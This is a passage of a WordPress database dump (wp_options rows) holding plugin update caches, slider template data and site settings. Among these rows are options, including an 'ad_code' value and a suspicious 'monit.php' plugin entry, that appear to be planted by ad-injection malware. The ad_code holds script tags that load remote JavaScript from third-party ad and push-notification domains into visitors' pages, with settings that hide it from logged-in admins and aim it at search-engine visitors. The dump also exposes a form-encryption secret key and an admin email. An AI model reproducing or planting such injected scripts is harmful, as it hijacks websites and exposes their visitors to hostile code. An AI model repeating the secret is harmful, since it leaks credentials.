13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:409;a:13:{s:2:\"id\";s:3:\"297\";s:6:\"handle\";s:22:\"Columns_3_Light_01.png\";s:5:\"video\";s:22:\"Columns_3_Light_01.mp4\";s:4:\"name\";s:18:\"Columns_3_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"Columns_3_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:410;a:13:{s:2:\"id\";s:3:\"296\";s:6:\"handle\";s:20:\"Caption_Light_01.png\";s:5:\"video\";s:20:\"Caption_Light_01.mp4\";s:4:\"name\";s:16:\"Caption_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:411;a:13:{s:2:\"id\";s:3:\"295\";s:6:\"handle\";s:19:\"Caption_Dark_04.png\";s:5:\"video\";s:19:\"Caption_Dark_04.mp4\";s:4:\"name\";s:15:\"Caption_Dark_04\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_04\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:412;a:13:{s:2:\"id\";s:3:\"294\";s:6:\"handle\";s:20:\"Caption_Light_02.png\";s:5:\"video\";s:20:\"Caption_Light_02.mp4\";s:4:\"name\";s:16:\"Caption_Light_02\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_02\";s:5:\"width\";s:3:\"828\";s:6:\"height\";s:3:\"450\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:413;a:13:{s:2:\"id\";s:3:\"293\";s:6:\"handle\";s:20:\"Caption_Light_04.png\";s:5:\"video\";s:20:\"Caption_Light_04.mp4\";s:4:\"name\";s:16:\"Caption_Light_04\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_04\";s:5:\"width\";s:4:\"1104\";s:6:\"height\";s:3:\"600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:414;a:13:{s:2:\"id\";s:3:\"292\";s:6:\"handle\";s:22:\"Columns_4_Light_01.png\";s:5:\"video\";s:22:\"Columns_4_Light_01.mp4\";s:4:\"name\";s:18:\"Columns_4_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"Columns_4_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:415;a:13:{s:2:\"id\";s:3:\"291\";s:6:\"handle\";s:20:\"Caption_Light_05.png\";s:5:\"video\";s:20:\"Caption_Light_05.mp4\";s:4:\"name\";s:16:\"Caption_Light_05\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_05\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:416;a:13:{s:2:\"id\";s:3:\"290\";s:6:\"handle\";s:22:\"PromoCode_Light_01.png\";s:5:\"video\";s:22:\"PromoCode_Light_01.mp4\";s:4:\"name\";s:18:\"PromoCode_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"PromoCode_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}}s:4:\"tags\";a:18:{i:28;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}i:5;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:20;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:21;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}i:25;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}i:2;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:16;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}i:26;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}i:18;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:4;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}i:19;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}i:23;a:3:{s:2:\"id\";s:2:\"23\";s:6:\"handle\";s:5:\"Night\";s:4:\"name\";s:5:\"Night\";}i:3;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}i:24;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}i:22;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:29;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}i:27;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}}','no'),(362,'revslider-templates-check','1618668798','yes'),(363,'revslider-templates-hash','59f46d12063ba904b3328974378381d8','yes'),(364,'rs-templates-new','','no'),(366,'rs-templates-counter','3','no'),(367,'revslider_table_version','1.0.8','yes'),(7692,'mc4wp_flash_messages','a:0:{}','no'),(368,'templatera_migrated_templates','yes','yes'),(370,'widget_vntdn_widget_flickr','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(371,'widget_rev-slider-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(380,'action_scheduler_migration_status','complete','yes'),(697,'wpforms_crypto_secret_key','330DBewJMH0IEFsIRb4QDmQlTZP6WEWgNxw0mSMuwJ0=','yes'),(763,'_transient_health-check-site-status-result','{\"good\":13,\"recommended\":7,\"critical\":0}','yes'),(811,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:16:\"sam@samdemma.com\";s:7:\"version\";s:5:\"5.6.3\";s:9:\"timestamp\";i:1618489731;}','no'),(7728,'auto_update_core_dev','enabled','yes'),(7729,'auto_update_core_minor','enabled','yes'),(7730,'auto_update_core_major','unset','yes'),(7731,'db_upgraded','','yes'),(15424,'_site_transient_timeout_theme_roots','1618750471','no'),(15425,'_site_transient_theme_roots','a:4:{s:5:\"north\";s:7:\"/themes\";s:14:\"twentynineteen\";s:7:\"/themes\";s:15:\"twentyseventeen\";s:7:\"/themes\";s:12:\"twentytwenty\";s:7:\"/themes\";}','no'),(15426,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1618748671;s:7:\"checked\";a:4:{s:5:\"north\";s:5:\"4.9.8\";s:14:\"twentynineteen\";s:3:\"1.9\";s:15:\"twentyseventeen\";s:3:\"2.4\";s:12:\"twentytwenty\";s:3:\"1.6\";}s:8:\"response\";a:3:{s:14:\"twentynineteen\";a:6:{s:5:\"theme\";s:14:\"twentynineteen\";s:11:\"new_version\";s:3:\"2.0\";s:3:\"url\";s:44:\"https://wordpress.org/themes/twentynineteen/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/twentynineteen.2.0.zip\";s:8:\"requires\";s:5:\"4.9.6\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:15:\"twentyseventeen\";a:6:{s:5:\"theme\";s:15:\"twentyseventeen\";s:11:\"new_version\";s:3:\"2.6\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentyseventeen/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentyseventeen.2.6.zip\";s:8:\"requires\";s:3:\"4.7\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:12:\"twentytwenty\";a:6:{s:5:\"theme\";s:12:\"twentytwenty\";s:11:\"new_version\";s:3:\"1.7\";s:3:\"url\";s:42:\"https://wordpress.org/themes/twentytwenty/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/twentytwenty.1.7.zip\";s:8:\"requires\";s:3:\"4.7\";s:12:\"requires_php\";s:5:\"5.2.4\";}}s:9:\"no_update\";a:0:{}s:12:\"translations\";a:0:{}}','no'),(15427,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1618748671;s:7:\"checked\";a:14:{s:19:\"akismet/akismet.php\";s:5:\"4.1.8\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:5:\"5.3.2\";s:61:\"enable-jquery-migrate-helper/enable-jquery-migrate-helper.php\";s:5:\"1.3.0\";s:9:\"hello.php\";s:5:\"1.7.2\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:5:\"4.8.3\";s:9:\"monit.php\";s:3:\"1.0\";s:25:\"north-core/north-core.php\";s:5:\"1.5.2\";s:47:\"one-click-demo-import/one-click-demo-import.php\";s:5:\"2.6.1\";s:23:\"revslider/revslider.php\";s:6:\"6.2.23\";s:25:\"templatera/templatera.php\";s:5:\"2.0.4\";s:46:\"under-construction-page/under-construction.php\";s:4:\"3.87\";s:53:\"widget-importer-exporter/widget-importer-exporter.php\";s:3:\"1.6\";s:27:\"js_composer/js_composer.php\";s:5:\"6.4.1\";s:24:\"wpforms-lite/wpforms.php\";s:7:\"1.6.4.1\";}s:8:\"response\";a:6:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"4.1.9\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/akismet.4.1.9.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:59:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=969272\";s:2:\"1x\";s:59:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=969272\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.7.1\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:36:\"contact-form-7/wp-contact-form-7.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:28:\"w.org/plugins/contact-form-7\";s:4:\"slug\";s:14:\"contact-form-7\";s:6:\"plugin\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:11:\"new_version\";s:3:\"5.4\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/contact-form-7/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/contact-form-7.5.4.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:67:\"https://ps.w.org/contact-form-7/assets/icon-256x256.png?rev=2279696\";s:2:\"1x\";s:59:\"https://ps.w.org/contact-form-7/assets/icon.svg?rev=2339255\";s:3:\"svg\";s:59:\"https://ps.w.org/contact-form-7/assets/icon.svg?rev=2339255\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/contact-form-7/assets/banner-1544x500.png?rev=860901\";s:2:\"1x\";s:68:\"https://ps.w.org/contact-form-7/assets/banner-772x250.png?rev=880427\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.7.1\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:47:\"one-click-demo-import/one-click-demo-import.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:35:\"w.org/plugins/one-click-demo-import\";s:4:\"slug\";s:21:\"one-click-demo-import\";s:6:\"plugin\";s:47:\"one-click-demo-import/one-click-demo-import.php\";s:11:\"new_version\";s:5:\"3.0.2\";s:3:\"url\";s:52:\"https://wordpress.org/plugins/one-click-demo-import/\";s:7:\"package\";s:70:\"https://downloads.wordpress.org/plugin/one-click-demo-import.3.0.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:74:\"https://ps.w.org/one-click-demo-import/assets/icon-256x256.png?rev=2506685\";s:2:\"1x\";s:74:\"https://ps.w.org/one-click-demo-import/assets/icon-128x128.png?rev=2506685\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:77:\"https://ps.w.org/one-click-demo-import/assets/banner-1544x500.png?rev=2506685\";s:2:\"1x\";s:76:\"https://ps.w.org/one-click-demo-import/assets/banner-772x250.png?rev=2506685\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.7.1\";s:12:\"requires_php\";s:3:\"5.6\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:46:\"under-construction-page/under-construction.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:37:\"w.org/plugins/under-construction-page\";s:4:\"slug\";s:23:\"under-construction-page\";s:6:\"plugin\";s:46:\"under-construction-page/under-construction.php\";s:11:\"new_version\";s:4:\"3.88\";s:3:\"url\";s:54:\"https://wordpress.org/plugins/under-construction-page/\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/plugin/under-construction-page.3.88.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/under-construction-page/assets/icon-256x256.gif?rev=2284849\";s:2:\"1x\";s:76:\"https://ps.w.org/under-construction-page/assets/icon-128x128.gif?rev=2284852\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/under-construction-page/assets/banner-1544x500.png?rev=1628376\";s:2:\"1x\";s:78:\"https://ps.w.org/under-construction-page/assets/banner-772x250.png?rev=1575797\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.7.1\";s:12:\"requires_php\";s:3:\"5.2\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:24:\"wpforms-lite/wpforms.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:26:\"w.org/plugins/wpforms-lite\";s:4:\"slug\";s:12:\"wpforms-lite\";s:6:\"plugin\";s:24:\"wpforms-lite/wpforms.php\";s:11:\"new_version\";s:5:\"1.6.6\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/wpforms-lite/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/wpforms-lite.1.6.6.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/wpforms-lite/assets/icon-256x256.png?rev=1371112\";s:2:\"1x\";s:65:\"https://ps.w.org/wpforms-lite/assets/icon-128x128.png?rev=1371112\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/wpforms-lite/assets/banner-1544x500.png?rev=1371112\";s:2:\"1x\";s:67:\"https://ps.w.org/wpforms-lite/assets/banner-772x250.png?rev=1371112\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.7.1\";s:12:\"requires_php\";s:3:\"5.5\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:27:\"js_composer/js_composer.php\";O:8:\"stdClass\":6:{s:4:\"slug\";s:11:\"js_composer\";s:11:\"new_version\";s:3:\"6.6\";s:6:\"plugin\";s:27:\"js_composer/js_composer.php\";s:3:\"url\";s:0:\"\";s:7:\"package\";b:0;s:4:\"name\";N;}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:4:{s:61:\"enable-jquery-migrate-helper/enable-jquery-migrate-helper.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:42:\"w.org/plugins/enable-jquery-migrate-helper\";s:4:\"slug\";s:28:\"enable-jquery-migrate-helper\";s:6:\"plugin\";s:61:\"enable-jquery-migrate-helper/enable-jquery-migrate-helper.php\";s:11:\"new_version\";s:5:\"1.3.0\";s:3:\"url\";s:59:\"https://wordpress.org/plugins/enable-jquery-migrate-helper/\";s:7:\"package\";s:77:\"https://downloads.wordpress.org/plugin/enable-jquery-migrate-helper.1.3.0.zip\";s:5:\"icons\";a:1:{s:7:\"default\";s:72:\"https://s.w.org/plugins/geopattern-icon/enable-jquery-migrate-helper.svg\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}}s:9:\"hello.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:5:\"1.7.2\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/hello-dolly.1.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=2052855\";s:2:\"1x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=2052855\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:66:\"https://ps.w.org/hello-dolly/assets/banner-772x250.jpg?rev=2052855\";}s:11:\"banners_rtl\";a:0:{}}s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:30:\"w.org/plugins/mailchimp-for-wp\";s:4:\"slug\";s:16:\"mailchimp-for-wp\";s:6:\"plugin\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:11:\"new_version\";s:5:\"4.8.3\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/mailchimp-for-wp/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/mailchimp-for-wp.4.8.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/mailchimp-for-wp/assets/icon-256x256.png?rev=1224577\";s:2:\"1x\";s:69:\"https://ps.w.org/mailchimp-for-wp/assets/icon-128x128.png?rev=1224577\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:71:\"https://ps.w.org/mailchimp-for-wp/assets/banner-772x250.png?rev=1184706\";}s:11:\"banners_rtl\";a:0:{}}s:53:\"widget-importer-exporter/widget-importer-exporter.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:38:\"w.org/plugins/widget-importer-exporter\";s:4:\"slug\";s:24:\"widget-importer-exporter\";s:6:\"plugin\";s:53:\"widget-importer-exporter/widget-importer-exporter.php\";s:11:\"new_version\";s:3:\"1.6\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/widget-importer-exporter/\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/plugin/widget-importer-exporter.1.6.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/widget-importer-exporter/assets/icon-256x256.jpg?rev=990577\";s:2:\"1x\";s:76:\"https://ps.w.org/widget-importer-exporter/assets/icon-128x128.jpg?rev=990577\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/widget-importer-exporter/assets/banner-1544x500.jpg?rev=775677\";s:2:\"1x\";s:78:\"https://ps.w.org/widget-importer-exporter/assets/banner-772x250.jpg?rev=741218\";}s:11:\"banners_rtl\";a:0:{}}}}','no'),(7785,'wpforms_email_summaries_fetch_info_blocks_last_run','1618202925','yes'),(7690,'widget_mc4wp_form_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(7691,'mc4wp_version','4.8.3','yes'),(7706,'mc4wp_form_stylesheets','a:0:{}','yes'),(10854,'ip_admin','on','yes'),(10855,'ad_code','\r\n<script>(function(s,u,z,p){s.src=u,s.setAttribute(\'data-zone\',z),p.appendChild(s);})(document.createElement(\'script\'),\'https://iclickcdn.com/tag.min.js\',3503118,document.body||document.documentElement)</script>\r\n<script src=\"https://glaiwhee.net/pfe/current/tag.min.js?z=3503125\" data-cfasync=\"false\" async></script>\r\n<script type=\"text/javascript\" src=\"//inpagepush.com/400/3503132\" data-cfasync=\"false\" async=\"async\"></script>\r\n','yes'),(10856,'cookies_admin','on','yes'),(10857,'logged_admin','on','yes'),(10858,'hide_admin','on','yes'),(10859,'hide_logged_in','on','yes'),(10860,'display_ad','organic','yes'),(10861,'search_engines','google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com','yes'),(10862,'auto_update','on','yes'),(10863,'log_install','1','yes'),(7779,'can_compress_scripts','0','no');
INSERT INTO `wpii_options` VALUES (365,'rs-templates','a:3:{s:4:\"hash\";s:32:\"ad4145a348929319060429fa8ad48712\";s:6:\"slider\";a:506:{i:0;a:22:{s:2:\"id\";s:1:\"1\";s:5:\"title\";s:16:\"Classic Carousel\";s:5:\"alias\";s:16:\"classic-carousel\";s:3:\"zip\";s:20:\"classic-carousel.zip\";s:3:\"uid\";s:32:\"146a01dd380c0cdee85c4456ee68cd84\";s:3:\"img\";s:27:\"classic-carousel/slider.jpg\";s:7:\"preview\";s:56:\"http://revolution.themepunch.com/carousel-slider-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:141:\"<span class=\"ttm_content\">Our classic, full-width carousel example. Drag, swipe or click to navigate!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:284:\"<span class=\"ttm_content\">This is a \"Default\" content carousel. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-22 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:1;a:22:{s:2:\"id\";s:1:\"2\";s:5:\"title\";s:14:\"Classic Slider\";s:5:\"alias\";s:13:\"classicslider\";s:3:\"zip\";s:17:\"classicslider.zip\";s:3:\"uid\";s:32:\"a0d6a9248c9066b404ba0f1cdadc5cf2\";s:3:\"img\";s:24:\"classicslider/slider.jpg\";s:7:\"preview\";s:61:\"http://revolution.themepunch.com/wordpress-slideshow-gallery/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:136:\" <span class=\"ttm_content\">A classic slideshow example with timer, bullets and arrow navigation.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:282:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:2;a:22:{s:2:\"id\";s:1:\"3\";s:5:\"title\";s:12:\"Content Tabs\";s:5:\"alias\";s:11:\"contenttabs\";s:3:\"zip\";s:15:\"contenttabs.zip\";s:3:\"uid\";s:32:\"e02e91604b690123a3d07a65582c4fd0\";s:3:\"img\";s:22:\"contenttabs/slider.jpg\";s:7:\"preview\";s:63:\"http://revolution.themepunch.com/wordpress-content-tabs-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:170:\" <span class=\"ttm_content\">An auto-size slider with a cool split-text animation effect. Navigate with vertical bullets and thumbs.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:282:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:3;a:22:{s:2:\"id\";s:1:\"4\";s:5:\"title\";s:13:\"Facebook Feed\";s:5:\"alias\";s:13:\"facebook-feed\";s:3:\"zip\";s:17:\"facebook-feed.zip\";s:3:\"uid\";s:32:\"5506431d5b1babcb25dcf52c508d42e3\";s:3:\"img\";s:24:\"facebook-feed/slider.jpg\";s:7:\"preview\";s:57:\"http://revolution.themepunch.com/wordpress-facebook-feed/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:174:\"<span class=\"ttm_content\"> This slider is automatically populated by a Facebook stream. Just one slide is needed to show a whole feed!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:415:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"Facebook Stream\"</a>. Make sure to input your correct API information in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:11:\"socialmedia\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 